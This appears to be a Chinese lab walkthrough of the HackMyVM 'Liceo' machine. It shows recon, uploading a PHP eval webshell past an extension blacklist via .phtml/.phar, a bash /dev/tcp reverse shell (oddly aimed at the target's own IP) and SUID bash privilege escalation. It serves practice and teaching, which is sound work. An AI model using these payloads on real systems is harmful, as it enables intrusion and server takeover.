liceo-hackmyvm
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Liceo
本机环境:NAT模式下,使用VirtualBox
信息收集:
首先局域网内探测靶机IP
发现IP为10.0.2.4
开启nmap扫描一下看看开了什么端口
扫描期间看一下web页面
这里发现web中并无什么可用的信息
这时端口也扫完了,这俩发现ftp可以进行一个匿名登录
登录进入发现这里并无什么有用信息就不截图了,这是简单扫一下目录
dirsearch -u http://10.0.2.4
漏洞利用
这里扫描完发现有两个目录
uploads,upload.php
直接访问,发现可以上传文件,直接上传一个php一句话木马,发现不允许上传php后缀的
<?php phpinfo(); @eval($_POST['shell']); ?>
此时进行一个黑名单绕过
这里上传一个php5后缀的文件,访问uploads目录发现文件不解析
此时选择更改后缀名
更改为phtml或phar等都是可以的
解析成功
我这里用的是蚁剑连接的
进入home发现第一个flag
提权
这里查一下suid
find / -perm -u=s -type f 2>/dev/null
发现 bash 有 suid,利用一下:
这里先将蚁剑上的shell弹到kali终端
nc -lvnp 1234 # kali 开启nc监听
蚁剑
bash -c 'exec bash -i &>/dev/tcp/10.0.2.4/1234 <&1'
连接成功
/usr/bin/bash -p
提权成功
拿到flag
![[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)](https://img-blog.csdnimg.cn/direct/fe37ee3eed4841558d05d5ad0f674fc9.png)
